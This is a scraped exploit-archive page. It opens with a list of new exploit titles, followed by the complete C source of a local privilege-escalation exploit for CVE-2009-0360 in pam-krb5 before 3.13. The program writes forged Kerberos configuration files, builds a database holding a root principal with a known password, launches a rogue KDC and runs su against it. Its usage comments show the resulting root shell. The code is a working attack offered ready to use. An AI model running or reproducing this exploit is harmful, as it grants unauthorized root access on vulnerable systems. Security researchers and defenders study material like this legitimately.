477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
163 lines
5.4 KiB
C
Executable file
163 lines
5.4 KiB
C
Executable file
/*
|
|
* cve-2009-0360.c
|
|
*
|
|
* pam-krb5 < 3.13 local privilege escalation
|
|
* Jon Oberheide <jon@oberheide.org>
|
|
* http://jon.oberheide.org
|
|
*
|
|
* Information:
|
|
*
|
|
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0360
|
|
*
|
|
* pam-krb5 before 3.13, when linked against MIT Kerberos, does not properly
|
|
* initialize the Kerberos libraries for setuid use, which allows local
|
|
* users to gain privileges by pointing an environment variable to a
|
|
* modified Kerberos configuration file, and then launching a PAM-based
|
|
* setuid application.
|
|
*
|
|
* Usage:
|
|
*
|
|
* $ gcc cve-2009-0360.c -o cve-2009-0360
|
|
* $ ./cve-2009-0360
|
|
* [+] creating krb5.conf
|
|
* [+] creating kdc.conf
|
|
* [+] creating kerberos database
|
|
* Loading random data
|
|
* Initializing database '/tmp/cve-2009-0360/principal' for realm 'TEST.COM',
|
|
* master key name 'K/M@TEST.COM'
|
|
* [+] adding principal root@TEST.COM
|
|
* Authenticating as principal root@TEST.COM with password.
|
|
* Enter KDC database master key:
|
|
* WARNING: no policy specified for root@TEST.COM; defaulting to no policy
|
|
* Principal "root@TEST.COM" created.
|
|
* [+] launching krb5kdc on 141.212.110.163:6666
|
|
* [+] launching su with fake KDC configuration
|
|
* [+] enter "root" at the password prompt
|
|
* Password:
|
|
* # id
|
|
* uid=0(root) gid=0(root) ...
|
|
*
|
|
* Notes:
|
|
*
|
|
* This exploit will result in local privilege escalation on hosts that use
|
|
* the pam-krb5 module for su authentication. Check the su and system-auth
|
|
* PAM configuration files in /etc/pam.d to determine if pam-krb5 is in use.
|
|
* Some customization of the defined constants and paths may be necessary
|
|
* for your environment. Be sure to set FAKE_KDC_HOST to the IP address of
|
|
* an active non-loopback interface on the target machine.
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <errno.h>
|
|
#include <unistd.h>
|
|
#include <sys/stat.h>
|
|
#include <sys/types.h>
|
|
#include <sys/wait.h>
|
|
|
|
#define REALM "TEST.COM"
|
|
#define FAKE_KDC_HOST "141.212.110.163"
|
|
#define FAKE_KDC_PORT "6666"
|
|
#define PRINCIPAL_NAME "root"
|
|
#define PRINCIPAL_PASS "root"
|
|
#define TMP_DIR "/tmp/cve-2009-0360"
|
|
#define KUTIL_PATH "/usr/sbin/kdb5_util"
|
|
#define KADMIN_PATH "/usr/sbin/kadmin.local"
|
|
#define KRB5KDC_PATH "/usr/sbin/krb5kdc"
|
|
|
|
#define KRB5_CONF \
|
|
"[libdefaults]\n\tdefault_realm = " REALM "\n\n[realms]\n\t" REALM \
|
|
" = {\n\t\tadmin_server = " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n\t\t" \
|
|
"default_domain = " REALM "\n\t\tkdc = " FAKE_KDC_HOST ":" FAKE_KDC_PORT \
|
|
"\n\t}\n\n[domain_realm]\n\t." REALM " = " REALM "\n\t" REALM " = " REALM
|
|
|
|
#define KDC_CONF \
|
|
"[kdcdefaults]\n\tkdc_ports = " FAKE_KDC_PORT "\n\n[realms]\n\t" REALM \
|
|
" = {\n\t\tdatabase_name = " TMP_DIR "/principal\n\t\tadmin_keytab = " \
|
|
"FILE:" TMP_DIR "/kadm5.keytab\n\t\tacl_file = " TMP_DIR "/kadm5.acl" \
|
|
"\n\t\tkey_stash_file = " TMP_DIR "/stash\n\t\tkdc_ports = " FAKE_KDC_PORT \
|
|
"\n\t\tmax_life = 10h 0m 0s\n\t\tmax_renewable_life = 7d 0h 0m 0s\n\t}"
|
|
|
|
int
|
|
main(void)
|
|
{
|
|
int ret;
|
|
FILE *fp;
|
|
char *err;
|
|
|
|
ret = mkdir(TMP_DIR, 0755);
|
|
if (ret == -1 && errno != EEXIST) {
|
|
err = "cannot create TMP_DIR";
|
|
printf("[-] Error: %s (%s)\n", err, strerror(errno));
|
|
return 1;
|
|
}
|
|
|
|
printf("[+] creating krb5.conf\n");
|
|
sleep(1);
|
|
|
|
fp = fopen(TMP_DIR "/krb5.conf", "w");
|
|
if (!fp) {
|
|
err = "cannot open krb5.conf";
|
|
printf("[-] Error: %s (%s)\n", err, strerror(errno));
|
|
return 1;
|
|
}
|
|
fwrite(KRB5_CONF, 1, strlen(KRB5_CONF), fp);
|
|
fclose(fp);
|
|
|
|
printf("[+] creating kdc.conf\n");
|
|
sleep(1);
|
|
|
|
fp = fopen(TMP_DIR "/kdc.conf", "w");
|
|
if (!fp) {
|
|
err = "cannot open kdc.conf";
|
|
printf("[-] Error: %s (%s)\n", err, strerror(errno));
|
|
return 1;
|
|
}
|
|
fwrite(KDC_CONF, 1, strlen(KDC_CONF), fp);
|
|
fclose(fp);
|
|
|
|
chdir(TMP_DIR);
|
|
|
|
printf("[+] creating kerberos database\n");
|
|
sleep(1);
|
|
|
|
ret = system(KUTIL_PATH " create -d " TMP_DIR "/principal -sf " TMP_DIR \
|
|
"/stash -r " REALM " -s -P \"\"");
|
|
if (WEXITSTATUS(ret) != 0) {
|
|
err = "kdb5_util command returned non-zero";
|
|
printf("[-] Error: %s, continuing exploit anyway\n", err);
|
|
}
|
|
|
|
printf("[+] adding principal " PRINCIPAL_NAME "@" REALM "\n");
|
|
sleep(1);
|
|
|
|
ret = system("echo \"\" | " KADMIN_PATH " -m -p " PRINCIPAL_NAME "@" REALM \
|
|
" -d " TMP_DIR "/principal -r " REALM " -q \"add_principal " \
|
|
"-pw " PRINCIPAL_PASS " " PRINCIPAL_NAME "@" REALM "\"");
|
|
if (WEXITSTATUS(ret) != 0) {
|
|
err = "kadmin.local command returned non-zero";
|
|
printf("[-] Error: %s, continuing exploit anyway\n", err);
|
|
}
|
|
|
|
printf("[+] launching krb5kdc on " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n");
|
|
sleep(1);
|
|
|
|
ret = system("KRB5_KDC_PROFILE=\"" TMP_DIR "/kdc.conf\" " KRB5KDC_PATH \
|
|
" -d " TMP_DIR "/principal -r " REALM);
|
|
if (WEXITSTATUS(ret) != 0) {
|
|
err = "krb5kdc command returned non-zero";
|
|
printf("[-] Error: %s, continuing exploit anyway\n", err);
|
|
}
|
|
|
|
printf("[+] launching su with fake KDC configuration\n");
|
|
sleep(1);
|
|
printf("[+] enter \"" PRINCIPAL_PASS "\" at the password prompt\n");
|
|
sleep(1);
|
|
|
|
system("KRB5_CONFIG=\"" TMP_DIR "/krb5.conf\" su");
|
|
|
|
return 0;
|
|
}
|
|
|
|
// milw0rm.com [2009-03-29]
|